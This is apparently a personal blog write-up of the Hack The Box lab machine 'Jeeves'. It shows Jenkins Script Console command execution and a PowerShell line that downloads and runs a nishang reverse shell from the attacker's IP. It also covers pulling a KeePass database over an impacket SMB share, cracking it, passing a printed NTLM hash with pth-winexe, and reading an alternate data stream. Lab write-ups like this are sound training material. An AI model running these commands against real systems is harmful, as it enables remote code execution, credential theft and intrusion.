HTB Write-up Jeeves (Windows) File Transferring with SMB file share(impacket tool), Poweshell & PowerUp, uncovering hidden data streams

Gorigorisensei
5 min readFeb 10, 2022

--

As usual, I followed IppSec’s video on how to crack this box

I had trouble getting the SMB file share on this one and it finally worked with the other impacket’s smbserver script. It was also fun to learn about the hidden data stream and how to view it.

Things I learned today & review:

KeePass —

  • KeePass Password Safe is a free and open-source password manager primarily for Windows. It officially supports macOS and Linux operating systems through the use of Mono. Additionally, there are several unofficial ports for Windows Phone, Android, iOS, and BlackBerry devices. KeePass stores usernames, passwords, and other fields, including free-form notes and file attachments, in an encrypted file. This file can be protected by any combination of a master password, a key file, and the current Windows account details. By default, the KeePass database is stored on a local file system. (KeePass — Wikipedia)
  • Keepass file has kdbx extension and you can grab the hash with keepass2john FILE.kbdx

Windows Powershell Commands

  • Powershell is in nishang for a reverse shell
  • Download a file from a web server
  • Make sure to copy the script to another file as you need to modify the file and add a line at the end (see an example command)

powershell IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.131/powershell.ps1')

Windows PrevEsc

  • PowerUp.ps1 in Powersploit/Privesc
  • to run, do “Invoke-AllChecks” on the victim’s computer

File Transferring to the Victim’s server via SMB

To run a smb server on our machine, go to /impacket/examples and do

python smbserver.py EVILSHARE /home/kali/unchiman

On the victim’s machine, run

New-PSDrive -Name “EVILSHARE” -PSProvider “FileSystem” -root “\\10.10.14.131\unchiman”

(Directory names can be anything)

Pass the hash (NTLM)

  • winexe -U jenkins/administrator //10.129.1.109 cmd.exe and hash when prompted for password

or

  • pth-winexe -U jenkins/administrator //10.129.1.109 cmd.exe

Unhidden data streams

  • dir /r show hidden data streams
  • more < hm.txt:root.txt:$DATA
  • powershell(Get-Content hm.txt -Stream root.txt)

Nmap result:

Not shown: 996 filtered tcp ports (no-response)

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 10.0

|_http-title: Ask Jeeves

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/10.0

135/tcp open msrpc Microsoft Windows RPC

445/tcp open microsoft-ds Microsoft Windows 7–10 microsoft-ds (workgroup: WORKGROUP)

50000/tcp open http Jetty 9.4.z-SNAPSHOT

|_http-title: Error 404 Not Found

|_http-server-header: Jetty(9.4.z-SNAPSHOT)

Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb-security-mode:

| account_used: guest

| authentication_level: user

| challenge_response: supported

|_ message_signing: disabled (dangerous, but default)

| smb2-security-mode:

| 3.1.1:

|_ Message signing enabled but not required

| smb2-time:

| date: 2022–02–09T07:47:47

|_ start_date: 2022–02–09T07:46:15

|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s

Port 80:

Port: 50000

Let’s do gobuster on both ports.

I found /askjeeves on port 50000

visiting the directory, I got into the Jenkin’s dashboard.

With the Jenkin’s dashboard, we can run scripts through Script Console in “Manage Jenkins” that lets you run Groovy script

try: cmd =”whoami” println cmd.execute().text

it worked!

Let’s grab a ps1 powershell from nishang.

make a new file for this particular box and copy & paste the example execution code at the bottom and modify IP

Run the python http server.

cmd =””” powershell IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.131/powershell.ps1') “””

println cmd.execute().text

Now I got the user shell.

Privesc

use the powerup script in Powersploit/Privesc/

IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.131/PowerUp.ps1')

and to execute it,

run “Invoke-AllChecks”

Didn’t find much here.

Let’s keep enumerating.

We found a keydatabase file.

Let’s get the file by creating a smb server on our kali machine!

/opt/impacket/examples smbserver.py

you need to have a directory with the name specified.

Now on the victim’s machine, run

New-PSDrive -Name “EVILSHARE” -PSProvider “FileSystem” -root “\\10.10.14.131\unchi”

once we have the keeppass file transfered over, we can to keepass2john CEH.kdbx to get the hash and crack it with hashcat.

Now to get into the server, we have to Download Keepass to our system.

sudo apt-get install keepassxc

got in.

in the backup file, I found NTLM hash.

Can we pass-the-hash it?

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

winexe -U jenkins/administrator //10.129.1.109 cmd.exe

this didn’t workout

tried pth-winexe -U jenkins/administrator //10.129.1.109 cmd.exe and worked!

hm.txt has a root flag but its data stream is hidden.

dir /r will show hidden data streams(reference: https://www.lifewire.com/dir-command-4050018#:~:text=Dir%20Command%20Options%20%20%20%20Item%20,the%20thousa%20...%20%2013%20more%20rows%20)

more < hm.txt:root.txt:$DATA will unhidden it. or

powershell(Get-Content hm.txt -Stream root.txt) works as well.

--

--